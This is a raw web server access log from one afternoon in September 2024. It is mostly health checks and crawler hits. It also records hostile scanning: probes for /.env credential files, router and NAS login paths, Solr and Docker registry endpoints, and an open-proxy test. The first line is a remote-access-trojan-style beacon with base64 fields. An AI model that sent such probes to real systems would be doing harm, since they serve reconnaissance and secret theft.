66.240.205.34 - - [02/Sep/2024:14:28:36 +0200] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 365 "-" "-"
195.56.55.225 - - [02/Sep/2024:14:28:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:30:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [02/Sep/2024:14:31:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:14:32:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:34:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:14:35:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:14:35:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:14:36:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.193.20.97 - - [02/Sep/2024:14:37:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
212.95.49.158 - - [02/Sep/2024:14:38:42 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:14:38:42 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:14:38:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.44.107.108 - - [02/Sep/2024:14:40:37 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:14:41:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:43:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:45:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.44.107.108 - - [02/Sep/2024:14:46:32 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:14:47:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:49:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:14:49:53 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:14:51:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:14:52:06 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
212.95.49.158 - - [02/Sep/2024:14:53:04 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:14:53:04 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:14:53:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:55:23 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:14:56:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.droppa.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:14:56:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:14:57:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.15.59.244 - - [02/Sep/2024:14:58:25 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:14:59:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
216.244.66.203 - - [02/Sep/2024:14:59:53 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
54.193.20.97 - - [02/Sep/2024:15:01:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [02/Sep/2024:15:01:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:03:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
216.244.66.203 - - [02/Sep/2024:15:04:10 +0200] "GET /kompasz/diszkriminacio_es_idegengyulolet HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
195.56.55.225 - - [02/Sep/2024:15:05:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:15:06:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:15:07:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:09:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:11:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.176.178.50 - - [02/Sep/2024:15:12:00 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [02/Sep/2024:15:13:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:15:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:17:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:20:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:15:21:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:15:22:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:15:23:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:15:24:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:15:25:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:25:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:26:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:15:27:26 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.grazroots.zpok.hu/owa/ HTTP/1.1" 404 303 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:27:27 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:28:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:15:28:18 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.95.49.158 - - [02/Sep/2024:15:28:36 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:28:37 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:30:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:32:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
124.243.137.11 - - [02/Sep/2024:15:34:09 +0200] "GET /cikk.php3?id_article=819 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:15:34:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:15:35:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:35:25 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:36:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:15:37:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:37:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:38:15 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:38:15 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:38:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:15:39:21 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
89.190.156.137 - - [02/Sep/2024:15:39:56 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:15:40:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [02/Sep/2024:15:42:35 +0200] "GET /.well-known/acme-challenge/B-QE-D2TIGYM5BCUEFFAK94SWTDO2TC0 HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:15:42:35 +0200] "GET /.well-known/acme-challenge/RG7Z_1VREWQNSGTLNHAJFP8HDPLOPK6B HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:15:42:35 +0200] "GET /.well-known/acme-challenge/L1I9JLKPTOB4N2RST2_U65DVUDITP8V5 HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:15:42:35 +0200] "GET /.well-known/acme-challenge/_RZO-143OOY5R2YERGSZ8RYF64K5JYDL HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:15:42:36 +0200] "GET /.well-known/acme-challenge/9226D3YZI17XEN5VQS6_43EWEN428LRZ HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:15:42:36 +0200] "GET /.well-known/acme-challenge/_-EB2Z6EA2QYRMJG3RN7NYDLE4WL9F-V HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [02/Sep/2024:15:42:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
109.245.39.65 - - [02/Sep/2024:15:43:39 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:15:44:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:46:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:48:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:50:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:52:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:15:54:34 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:15:54:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:15:55:44 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:55:44 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:55:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.emla.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:15:55:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:15:56:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:15:59:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:15:59:48 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:16:01:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.176.178.50 - - [02/Sep/2024:16:02:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [02/Sep/2024:16:03:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
84.225.186.83 - - [02/Sep/2024:16:04:29 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:16:05:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
84.225.186.83 - - [02/Sep/2024:16:06:00 +0200] "-" 408 - "-" "-"
84.225.186.83 - - [02/Sep/2024:16:06:00 +0200] "-" 408 - "-" "-"
60.191.125.35 - - [02/Sep/2024:16:07:07 +0200] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:16:07:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:09:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.156.68.104 - - [02/Sep/2024:16:10:00 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0"
195.56.55.225 - - [02/Sep/2024:16:11:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.156.68.104 - - [02/Sep/2024:16:11:57 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28"
195.56.55.225 - - [02/Sep/2024:16:13:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:15:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:16:16:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
95.214.53.45 - - [02/Sep/2024:16:17:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:16:17:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:16:17:48 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:16:19:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:21:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:16:22:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:16:23:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:25:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:27:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:29:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:16:30:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.etk.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:30:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:30:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:30:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:30:09 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:30:09 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:16:31:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:16:33:33 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:16:33:33 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:16:33:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:36:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:38:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:40:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:16:41:07 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:16:42:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:44:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:46:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:16:48:20 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
167.253.34.3 - - [02/Sep/2024:16:49:14 +0200] "GET /robots.txt HTTP/1.0" 404 274 "-" "Mozilla/4.0 (compatible; fluid/0.0; +http://www.leak.info/bot.html)"
195.56.55.225 - - [02/Sep/2024:16:50:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:16:50:56 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:16:52:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
60.191.125.35 - - [02/Sep/2024:16:52:44 +0200] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:16:54:06 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:16:54:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
104.167.223.198 - - [02/Sep/2024:16:55:46 +0200] "GET /nginx_status HTTP/1.1" 404 288 "-" "Go-http-client/1.1"
54.193.20.97 - - [02/Sep/2024:16:56:02 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [02/Sep/2024:16:56:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
188.36.70.117 - - [02/Sep/2024:16:57:53 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:16:58:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:00:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:02:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:04:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:06:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.52.167 - - [02/Sep/2024:17:08:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:17:08:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:11:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:13:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:17:15:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET /odinhttpcall1725290167 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
104.248.25.91 - - [02/Sep/2024:17:16:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
159.65.121.249 - - [02/Sep/2024:17:16:07 +0200] "GET /v2/_catalog HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
165.22.93.250 - - [02/Sep/2024:17:16:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.220.56 - - [02/Sep/2024:17:16:07 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
209.38.206.157 - - [02/Sep/2024:17:16:07 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
164.90.212.153 - - [02/Sep/2024:17:16:07 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
209.38.206.157 - - [02/Sep/2024:17:16:07 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:17:16:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
